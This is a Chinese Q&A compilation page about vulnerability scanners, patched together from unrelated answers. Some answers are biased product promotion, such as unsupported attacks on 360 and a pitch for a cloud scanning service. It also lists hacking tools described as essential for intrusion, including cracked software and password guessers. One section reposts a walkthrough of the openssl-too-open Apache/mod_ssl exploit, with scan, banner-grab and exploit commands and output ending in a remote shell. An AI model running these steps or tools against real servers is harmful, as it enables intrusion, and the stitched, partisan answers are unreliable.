1、漏洞掃描工具
金山衛士是最好用的漏洞掃描工具,我不騙你真的超好用,漏洞修復的技術也是超棒的,比別看他沒宣傳,其實它的功能還是相當可以的,對於企業業務的人士也是電腦必備的軟體哦,你別看大多數的電腦里都裝了360安全衛士,其實360安全衛士一點也不好,它只是被大規模的宣傳過,其實真的不好,不然電腦中安裝360的用戶怎麼都說不好,殺毒的效果也不好,掃描漏洞的功能更差,這就是360的虛假信息,我現在回答主題,金山衛士好,我現在沒在宣傳,真的很好用,採納不採納我的回答你自己決定。
2、如何選擇安全漏洞掃描工具
2 隱患掃描工具的衡量因素 決定是否採用隱患掃描工具來防範系統入侵是重要的第一步.當您邁出了這一步後,接下來的是:如何選擇滿足您公司需要的合適的隱患掃描技術,這同樣也很重要.以下列出了一系列衡量因素:① 底層技術(比如,是被動掃描還是主動掃描,是基於主機掃描還是基於網路掃描); ② 特性; ③ 漏洞庫中的漏洞數量; ④ 易用性; ⑤ 生成的報告的特性(內容是否全面、是否可配置、是否可定製、報告的格式、輸出方式等); ⑥ 對於漏洞修復行為的分析和建議(是否只報告存在哪些問題、是否會告訴您應該如何修補這些漏洞); ⑦ 安全性(由於有些掃描工具不僅僅只是發現漏洞,而且還進一步自動利用這些漏洞,掃描工具自身是否會帶來安全風險); ⑧ 性能; ⑨ 價格結構 2.1 底層技術 比較漏洞掃描工具,第一是比較其底層技術.你需要的是主動掃描,還是被動掃描;是基於主機的掃描,還是基於網路的掃描,等等.一些掃描工具是基於Internet的,用來管理和集合的伺服器程序,是運行在軟體供應商的伺服器上,而不是在客戶自己的機器上.這種方式的優點在於檢測方式能夠保證經常更新,缺點在於需要依賴軟體供應商的伺服器來完成掃描工作.掃描古城可以分為"被動"和"主動"兩大類.被動掃描不會產生網路流量包,不會導致目標系統崩潰,被動掃描工具對正常的網路流量進行分析,可以設計成"永遠在線"檢測的方式.與主動掃描工具相比,被動掃描工具的工作方式,與網路監控器或IDS類似.主動掃描工具更多地帶有"入侵"的意圖,可能會影響網路和目標系統的正常操作.他們並不是持續不斷運行的,通常是隔一段時間檢測一次.基於主機的掃描工具需要在每台主機上安裝代理(Agent)軟體;而基於網路的掃描工具則不需要.
3、常用的漏洞掃描軟體有哪些其功能是什麼
採用多線程方式對指定IP地址段(或單機)進行安全漏洞檢測,支持插件功能,提供了圖形界面和命令行兩種操作方式,掃描內容包括:遠程操作系統類型及版本,標准埠狀態及埠BANNER信息,CGI漏洞,IIS漏洞,RPC漏洞,SQL-SERVER、FTP-SERVER、SMTP-SERVER、POP3-SERVER、NT-SERVER弱口令用戶,NT伺服器NETBIOS信息等。掃描結果保存在/log/目錄中,index_*.htm為掃描結果索引文件。
4、大神們 Linux伺服器一般用什麼的工具掃描漏
目前,市場上有很多漏洞掃描工具,按照不同的技術(基於網路的、基於主機的、基於代理的、C/S的)、不同的特徵、不同的報告方法,以及不同的監聽模式,可以分成好幾類。
不同的產品之間,漏洞檢測的准確性差別較大,這就決定了生成的報告的有效性上也有很大區別。
選擇正確的漏洞掃描工具,對於提高你的系統的安全性,非常重要。
本文除為讀者說明如何正確選擇一款合適的安全漏洞掃描工具,也會結合實際的安全產品——雲鑒漏洞掃描雲平台進行說明。
1、漏洞掃描概述
在字典中,Vulnerability意思是漏洞或者缺乏足夠的防護。在軍事術語中,這個詞的意思更為明確,也更為嚴重------有受攻擊的嫌疑。
每個系統都有漏洞,不論你在系統安全性上投入多少財力,攻擊者仍然可以發現一些可利用的特徵和配置缺陷。
這對於安全管理員來說,實在是個不利的消息。但是,多數的攻擊者,通常做的是簡單的事情。
發現一個已知的漏洞,遠比發現一個未知漏洞要容易的多,這就意味著:多數攻擊者所利用的都是常見的漏洞,這些漏洞,均有書面資料記載。
這樣的話,採用適當的工具,就能在黑客利用這些常見漏洞之前,查出網路的薄弱之處。如何快速簡便地發現這些漏洞,這個非常重要。
漏洞,大體上分為兩大類:
① 軟體編寫錯誤造成的漏洞;
② 軟體配置不當造成的漏洞。
漏洞掃描工具均能檢測以上兩種類型的漏洞。漏洞掃描工具已經出現好多年了,安全管理員在使用這些工具的同時,黑客們也在利用這些工具來發現各種類型的系統和網路的漏洞。
雲鑒漏洞掃描雲平台由北京安普諾信息技術有限公司(Anpro,簡稱安普諾)自主研發上線。
目前針對Linxu伺服器中常規漏洞進行安全掃描,能夠有效發現系統中存在的安全漏洞,除此之外,也為用戶提供Andorid應用的漏洞掃描。
以此安全掃描平台為例,它適合於Linux操作系統,具體適合RedHat、CentOS系列的操作系統,所以需要對Linux操作系統進行掃描的就可以選擇了。
2、漏洞掃描工具的衡量因素
決定是否採用漏洞掃描工具來防範系統入侵是重要的第一步。當您邁出了這一步後,接下來的是:如何選擇滿足您公司需要的合適的漏洞掃描技術,這同樣也很重要。
以下列出了一系列衡量因素:
① 底層技術(比如,是被動掃描還是主動掃描,是基於主機掃描還是基於網路掃描);
② 特性;
③ 漏洞庫中的漏洞數量;
④ 易用性;
⑤ 生成的報告的特性(內容是否全面、是否可配置、是否可定製、報告的格式、輸出方式等);
⑥ 對於漏洞修復行為的分析和建議(是否只報告存在哪些問題、是否會告訴您應該如何修補這些漏洞);
⑦ 安全性(由於有些掃描工具不僅僅只是發現漏洞,而且還進一步自動利用這些漏洞,掃描工具自身是否會帶來安全風險);
⑧ 性能;
⑨ 價格結構
雲鑒採用基於主機的主動掃描,漏洞庫中收集了常規系統、組件、應用、服務漏洞,除此之外實時更新最新漏洞進入漏洞庫,採用C/S模式,用戶只需要執行一條命令便能查看到報告。
按照伺服器台數進行收費,出具的報告中包括對漏洞的分析和修復建議。
5、伺服器主機漏洞掃描軟體
SSS掃描之王,是俄羅斯的一個安全漏洞掃描軟體,十分強大,具體的可以百度,免注冊的
6、黑客漏洞掃描工具使用方法
掃描工具 Domain2.2 -集WHOIS查詢、上傳頁面批量檢測、木馬上傳、資料庫瀏覽及加密解密於一體。 X-way 2.5 -不錯的掃描器,功能多,使用也不難,入侵必備。 SuperScan 3.0 -強大的TCP 埠掃描器、Ping 和域名解析器。 Namp 3.5 -安全界人人皆知的非常有名氣的一個掃描器,作者Fyodor。 Hscan v1.20 -運行在Win NT/2000下的漏洞掃描工具,有GUI以及命令行兩種掃描方式。 SSS -俄羅斯安全界非常專業的一個安全漏洞掃描軟體。 U-Scan.exe -非常好的UNICODE漏洞掃描工具。 RpcScan V1.1 -可以通過135埠枚舉遠程主機RPC連接信息。 SHED 1.01 -一個用來掃描共享漏洞的機器的工具。 DSScan V1.00 -ms04-011遠程緩沖區溢出漏洞掃描專用。 Dotpot PortReady1.6 - 「綠色軟體,」無需安裝,非常小巧(23KB),具有極快的掃描速度。 WebD***Scan v1.0 -針對WEBD***漏洞的掃描工具。 注意:該軟體會被查殺! Socks Proxy Finder2 -掃描埠速度非常快的一個工具,掃描完畢後還可以導出保存起來。 SQLScan v1.2 -猜解開著1433埠的主機密碼工具。 RPC漏洞掃描器 v1.03 -針對RPC漏洞掃描的工具! 流光5.0 破解版 -國內有名的黑客掃描工具,由高級程序員小榕編寫。 WIN2K自動攻擊探測機 -Windows NT/2000 自動攻擊探測機。 4899空口令探測 -能夠快速的掃描到被安裝了radmin服務端4899埠的空口令IP。注意:會被查殺! 關鍵是你沒說你用哪種啊 ~ 具體是哪款~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
7、如何選擇漏洞掃描工具
不錯不錯。。。學習了下
8、求可以掃描ip主機漏洞的軟體,附帶漏洞利用的更好,win7的
apache_openssl漏洞的利用及許可權的提升
apache_openssl漏洞的利用及許可權的提升
--nightcat
轉載請保持文章完整
第一部分:獲得shell.
在packetstorm玩了一段時間,遇到有openssl-too-open.tar.gz這個exploit.
現在看看軟體包的描述:
OpenSSL v0.9.6d and below remote exploit for Apache/mod_ssl servers which takes advantage of the KEY_ARG overflow. Tested against most major Linux distributions. Gives a remote nobody shell on Apache and remote root on other servers. Includes an OpenSSL vulnerability scanner which is more reliable than the RUS-CERT scanner and a detailed vulnerability analysis
這個描述說明這個exploit 是openssl v 0.9.6的key_arg的漏洞來達到溢出的目的。不過也要
注意apache/mod_ssl的版本信息。對於大多數的有這樣條件的都能溢出成功。取得一個id是
nobody shell,有些甚至是root的許可權。軟體包裡面有一個掃描器,exploit。
好象聽起來很誘人,down回來研究一下。
nightcat@nightcat$tar -zxvf openssl-too-open.tar.gz
nightcat@nightcat$cd openssl-too-open
Makefile README linux-x86.c main.c main.h scanner.c ssl2.c ssl2.h
習慣性的要讀一下軟體包的REAMDE文件。
nightcat@nightcat$ more README
得到一些有用的信息:
1.編譯的方法:
直接make就可以,之後就可以得到openssl-too-open和openssl-scanner
2.openssl-too-open的用法:
Usage: ./openssl-too-open [options] <host>
-a <arch> target architecture (default is 0x00)
-p <port> SSL port (default is 443)
-c <N> open N apache connections before sending the shellcode (default is 30)
-m <N> maximum number of open connections (default is 50)
-v verbose mode
Supported architectures:
0x00 - Gentoo (apache-1.3.24-r2)
0x01 - Debian Woody GNU/Linux 3.0 (apache-1.3.26-1)
0x02 - Slackware 7.0 (apache-1.3.26)
0x03 - Slackware 8.1-stable (apache-1.3.26)
0x04 - RedHat Linux 6.0 (apache-1.3.6-7)
0x05 - RedHat Linux 6.1 (apache-1.3.9-4)
0x06 - RedHat Linux 6.2 (apache-1.3.12-2)
0x07 - RedHat Linux 7.0 (apache-1.3.12-25)
0x08 - RedHat Linux 7.1 (apache-1.3.19-5)
0x09 - RedHat Linux 7.2 (apache-1.3.20-16)
0x0a - Redhat Linux 7.2 (apache-1.3.26 w/PHP)
0x0b - RedHat Linux 7.3 (apache-1.3.23-11)
0x0c - SuSE Linux 7.0 (apache-1.3.12)
0x0d - SuSE Linux 7.1 (apache-1.3.17)
0x0e - SuSE Linux 7.2 (apache-1.3.19)
0x0f - SuSE Linux 7.3 (apache-1.3.20)
0x10 - SuSE Linux 8.0 (apache-1.3.23-137)
0x11 - SuSE Linux 8.0 (apache-1.3.23)
0x12 - Mandrake Linux 7.1 (apache-1.3.14-2)
0x13 - Mandrake Linux 8.0 (apache-1.3.19-3)
0x14 - Mandrake Linux 8.1 (apache-1.3.20-3)
0x15 - Mandrake Linux 8.2 (apache-1.3.23-4)
/****想成功,就要看準系統類型 和apache版本號
*****如果是 0x07 - RedHat Linux 7.0 (apache-1.3.12-25):
*****./epenssl-too-open -a 0x07 ip .就應該可以啦!
****/
3.openssl-scanner的用法:
Usage: ./openssl-scanner [options] <host>
-i <inputfile> file with target hosts
-o <outputfile> output log
-a append to output log (requires -o)
-b check for big endian servers
-C scan the entire class C network the host belogs to
-d debug mode
-w N connection timeout in seconds
Examples: ./openssl-scanner -d 192.168.0.1
./openssl-scanner -i hosts -o my.log -w 5
./openssl-scanner -C 192.168.0.0
/****掃描一個c類的ip
*****./openssl-scanner -C 192.168.0.0
****/
4.一個實現例子:
$ ./openssl-scanner -C 192.168.0.0
: openssl-scanner : OpenSSL vulnerability scanner
by Solar Eclipse <[email protected]>
Opening 255 connections . . . . . . . . . . done
Waiting for all connections to finish . . . . . . . . . . . done
192.168.0.136: Vulnerable
$ nc 192.168.0.1 80
HEAD / HTTP/1.0
HTTP/1.1 200 OK
Date: Tue, 17 Sep 2002 17:47:44 GMT
Server: Apache-AdvancedExtranetServer/1.3.20 (Mandrake Linux/3mdk) mod_ssl/2.8.4 OpenSSL/0.9.6b
Connection: close
Content-Type: text/html
./openssl-too-open -a 0x14 192.168.0.1
: openssl-too-open : OpenSSL remote exploit
by Solar Eclipse <[email protected]>
: Opening 30 connections
Establishing SSL connections
: Using the OpenSSL info leak to retrieve the addresses
ssl0 : 0x810b3a0
ssl1 : 0x810b360
ssl2 : 0x810b4e0
* Addresses don't match.
: Opening 40 connections
Establishing SSL connections
: Using the OpenSSL info leak to retrieve the addresses
ssl0 : 0x8103830
ssl1 : 0x80fd668
ssl2 : 0x80fd668
* Addresses don't match.
: Opening 50 connections
Establishing SSL connections
: Using the OpenSSL info leak to retrieve the addresses
ssl0 : 0x8103830
ssl1 : 0x8103830
ssl2 : 0x8103830
: Sending shellcode
ciphers: 0x8103830 start_addr: 0x8103770 SHELLCODE_OFS: 184
Reading tag
Execution of stage1 shellcode succeeded, sending stage2
Spawning shell...
bash: no job control in this shell
bash-2.05$
bash-2.05$ uname -a; id; w;
Linux localhost.localdomain 2.4.8-26mdk #1 Sun Sep 23 17:06:39 CEST 2001 i686 unknown
uid=48(apache) gid=48(apache) groups=48(apache)
1:49pm up 4:26, 1 user, load average: 0.04, 0.07, 0.07
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
bash-2.05$
整個README 文件已經說的很明白了:
現在是總結一下實現的過程:
1.通過openssl-scanner來掃描一個c段的ip,找到有漏洞的主機,
2.用nc的方法查找banner得到三個目標內容:apache的版本號,openssl的版本號,操作系統版本3.在通過openssl-too-open來進行溢出得到一個shell.
9、區域網主機安全漏洞掃描工具
360免費軟體就可以掃區域網主機的,去360官網上下吧。
機漏洞掃描器(Host Scanner)也可以進行主機漏洞掃描,需要你設置主機的IP 埠 然後根據返回信息來判斷
10、雲伺服器系統漏洞掃描用什麼軟體?
雲幫手這款工具軟體。
不僅僅是雲主機掃描系統漏洞的需要,而且還滿足了雲主機系統修復和後續的拓展需要。這款軟體就叫雲幫手,值得一提的同類軟體有不少是付費版的,但是這款軟體是免費的。